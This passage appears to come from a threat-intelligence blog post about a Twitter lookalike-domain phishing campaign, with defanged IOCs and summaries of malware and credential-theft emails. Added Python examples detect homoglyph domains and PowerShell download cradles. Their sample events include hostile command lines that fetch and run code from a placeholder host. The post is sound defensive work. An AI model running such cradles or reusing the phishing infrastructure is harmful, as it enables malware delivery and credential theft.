The attacker may also have intended to typosquat and catch victims who were never directly targeted. Typosquatting, or URL hijacking, relies on users making small mistakes when typing a URL, such as typing a dash where a period belongs or misspelling the domain. The attacker registers the mistyped URL, so anyone who arrives there by accident gets whatever the attacker has put on that page.

Figure 5: Phishing Page

As seen in Figure 5 above, users are presented with a login page for either attack, however this one is specifically for the phish located at twlttęr[.]com. This page is made to look extremely close to the current Twitter login page that can be seen on a desktop browser. The obvious difference between this phishing attack and the legitimate Twitter login page would be the URL, with its unusual letter ‘ę’, and the atypical tab icon.

Figure 5 shows the first iteration of the attack; the second iteration pairs an even more plausible email body with a URL that sits closer to the legitimate one. Either way, the address bar is where the deception shows, so users should pay close attention to the URLs in it.
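The three spellings of the lookalike domain discussed above (percent-encoded, Unicode, punycode) and the brand-in-domain trick of the second iteration can be checked mechanically. The following is an added example, not code from the Cofense post: it refangs the defanged IOC strings used on this page, recovers the Unicode and punycode (A-label) forms of the hostname, and scores the registrable domain against an assumed brand list. The brand list, the set of legitimate domains, the two-edit threshold and the naive “last two labels” rule for the registrable domain are assumptions; a production check would use the Public Suffix List and the Unicode confusables data rather than this diacritic-stripping skeleton.

```python
import re
import unicodedata
from urllib.parse import unquote, urlsplit

# Assumptions for the check: the post only concerns Twitter, and twitter.com is its real domain.
BRANDS = ("twitter",)
LEGIT_DOMAINS = {"twitter.com"}


def refang(ioc: str) -> str:
    """Turn the defanged form used in the IOC list (hXXps, [.]) back into a real URL."""
    return re.sub(r"^hxxp", "http", ioc.replace("[.]", "."), flags=re.IGNORECASE)


def unicode_host(url: str) -> str:
    """Hostname as the address bar would display it: percent-decode, then expand xn-- labels."""
    host = unquote(urlsplit(refang(url)).hostname or "").rstrip(".")
    return ".".join(
        label.encode("ascii").decode("idna") if label.startswith("xn--") else label
        for label in host.split(".")
    )


def alabel(host: str) -> str:
    """The ASCII (punycode) form DNS actually resolves; this is what belongs in blocklists."""
    return host.encode("idna").decode("ascii")


def skeleton(label: str) -> str:
    """Strip combining marks so that, for example, 'ę' folds to 'e' before comparison."""
    decomposed = unicodedata.normalize("NFKD", label)
    return "".join(c for c in decomposed if not unicodedata.combining(c))


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (Wagner-Fischer)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze(url: str) -> dict:
    host = unicode_host(url)
    registrable = ".".join(host.split(".")[-2:])  # naive; use the Public Suffix List in production
    second_level = skeleton(registrable.split(".")[0])
    findings = []
    if any(ord(c) > 127 for c in host):
        findings.append("non-ASCII characters in hostname")
    if registrable not in LEGIT_DOMAINS:
        for brand in BRANDS:
            if brand in second_level:
                findings.append(f"brand '{brand}' embedded in an unrelated domain")
            elif edit_distance(second_level, brand) <= 2:
                findings.append(f"'{second_level}' is within 2 edits of '{brand}'")
    return {
        "host": host,
        "alabel": alabel(host),
        "registrable": registrable,
        "suspicious": bool(findings),
        "findings": findings,
    }


if __name__ == "__main__":
    for ioc in ("hXXps://twltt%C4%99r[.]com",
                "hXXps://xn--twlttr-04a[.]com/login/",
                "hXXps://mobiles-twitter[.]com/login/",
                "https://mobile.twitter.com/"):
        print(analyze(ioc))
```

Both phishing hosts resolve to the same Unicode name and the same xn--twlttr-04a.com A-label, which is the string to block; the legitimate mobile.twitter.com passes because its registrable domain is on the allowlist, not because it looks different.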

 

Network IOCs and IPs

URL: hXXps://mobiles-twitter[.]com/login/
IP: 70[.]37[.]100[.]82

URL: hXXps://twltt%C4%99r[.]com
IP: 70[.]37[.]100[.]82

URL: hXXps://xn--twlttr-04a[.]com/login/
IP: 70[.]37[.]100[.]82

URL: hXXps://t[.]co/U6DLQ2B1xC

 


Phish Found in Proofpoint-Protected Environments – Week Ending June 14, 2020


Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Cofense sees macro-laden attachments reaching the inbox so frequently, we did a Phish Fryday episode on the topic.

TYPE: Malware – NanoCore

DESCRIPTION: This phish spoofs an international lifestyle company to deliver a macro-laden Microsoft Publisher file. Once enabled, the macros download a series of HTA scripts to unpack enclosed .NET libraries which then unpack and run the NanoCore Remote Access Trojan. The use of Publisher files in phishing attacks is not new, as Cofense reported on its use in the Necurs botnet back in 2018.

TYPE: Credential Theft

DESCRIPTION: This French phish – poisson? – pretends to be a number of missed calls. The link leads to a web form designed to steal credentials. Attackers leverage the simplicity of many voicemail notification emails, as Cofense has been reporting for over a year.

TYPE: Malware – Ursnif

DESCRIPTION: This Italian-language phish uses a tactic that is successful far too often – Microsoft Office documents (in this case Excel) that contain malicious macros. This sample delivered the Ursnif data stealer. Ursnif is hardly a newcomer to the phishing threat landscape, as Cofense has been reporting on it for years.

TYPE: Credential Theft

DESCRIPTION: Got documents? This phishing attempt claims to deliver an important PDF file but leads to a website designed to steal Office 365 credentials. Once these credentials are provided, the victim is redirected to a document hosted on Google Drive.

TYPE: Reconnaissance

DESCRIPTION: Information gathering is often a prelude to a cyberattack and this phish used a layered approach to perform reconnaissance on the target. Using an embedded URL, the victim is lured into downloading an archive containing a VBScript (.vbs). This script then attempts to download a PowerShell script that will gather information about the infected endpoint and environment.

TYPE: Credential Theft

DESCRIPTION: With a smorgasbord of foreign language-themed attacks in this week’s catch, this Swedish phish delivers an embedded URL that leads the victim to a Microsoft OneNote-hosted page designed to steal Office 365 credentials. Once provided, the victim is redirected to a document hosted on docdroid. Attackers leveraging Microsoft infrastructure to host malicious OneNote documents is nothing new.

TYPE: Credential Theft

DESCRIPTION: Here’s another example of voicemail spoofing. This one leads to a website designed to steal Office 365 credentials and then direct the victim to office.com. Simple. Effective.

TYPE: Malware – TrickBot

DESCRIPTION: While many of us like to enjoy a cup of java in the morning, this phishing attack uses Java Network Launch Protocol files (.jnlp), which Java Web Start opens to pull down a Java Archive (.jar); the JAR then downloads and runs the TrickBot trojan. Hardly something you’d like to wake up to.

TYPE: Credential Theft

DESCRIPTION: This Coronavirus-themed phish promises a survey designed to steal corporate credentials. The malicious survey is hosted on Microsoft infrastructure – SharePoint – and exfiltrates the credentials using the legitimate SubmitSurveyData Microsoft URL. Survey phish is hardly a new tactic.
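The reconnaissance chain above (a VBScript fetching a PowerShell script), the NanoCore Publisher macros that drop HTA scripts, and the .jnlp-to-JAR TrickBot loader share one observable on the endpoint: a script host, an Office application or the Java runtime spawning a downloader. The following is an added example, not code from the Cofense post: a small detection run over constructed Sysmon-style process-creation events (EventID 1, one JSON object per line). The parent-process list, the cradle regex, the sample events and the example.invalid URLs are all assumptions built for the illustration, not real telemetry.

```python
import json
import re
from typing import Optional

# Parents that should rarely launch PowerShell on a workstation (assumption: tune to your estate).
SCRIPT_HOSTS_AND_OFFICE = {
    "wscript.exe", "cscript.exe", "mshta.exe",
    "winword.exe", "excel.exe", "mspub.exe", "powerpnt.exe",
    "java.exe", "javaw.exe",
}

# Download cradles and the abbreviated -EncodedCommand switches (-e, -ec, -en, -enc ...) PowerShell accepts.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|(?:^|\s)-e(?:c|n[a-z]*)?(?=\s)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert for a process-creation event that launches PowerShell suspiciously, else None."""
    if event.get("EventID") != 1:
        return None
    image = basename(event.get("Image", ""))
    if image not in {"powershell.exe", "pwsh.exe"}:
        return None
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in SCRIPT_HOSTS_AND_OFFICE:
        reasons.append(f"PowerShell spawned by {parent}")
    match = CRADLE.search(cmd)
    if match:
        reasons.append(f"download/encoded cradle: {match.group(0).strip()}")
    if not reasons:
        return None
    return {"host": event.get("Computer"), "parent": parent, "reasons": reasons, "cmd": cmd}


def scan(jsonl: str) -> list:
    """Run evaluate() over a JSON-lines feed and collect the alerts in order."""
    alerts = []
    for line in jsonl.splitlines():
        if line.strip():
            alert = evaluate(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample events (not real telemetry). Raw string so the JSON backslash escapes survive.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/recon.ps1')"}
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"}
{"EventID": 3, "Computer": "WS01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.10"}
{"EventID": 1, "Computer": "WS02", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Java\\jre1.8.0_251\\bin\\javaw.exe", "CommandLine": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"EventID": 1, "Computer": "WS03", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "powershell.exe -w hidden -c iwr http://example.invalid/inv.exe -OutFile C:\\Users\\Public\\inv.exe"}
{"EventID": 1, "Computer": "WS03", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.zip','a.zip')"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["parent"], "; ".join(alert["reasons"]))
```

The parent check and the command-line check are scored separately, so a cradle launched from cmd.exe still alerts on the command line alone, while an administrator’s PowerShell session started from Explorer produces nothing. Network events (EventID 3) are ignored here; correlating them with the alerting process is the natural next step.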
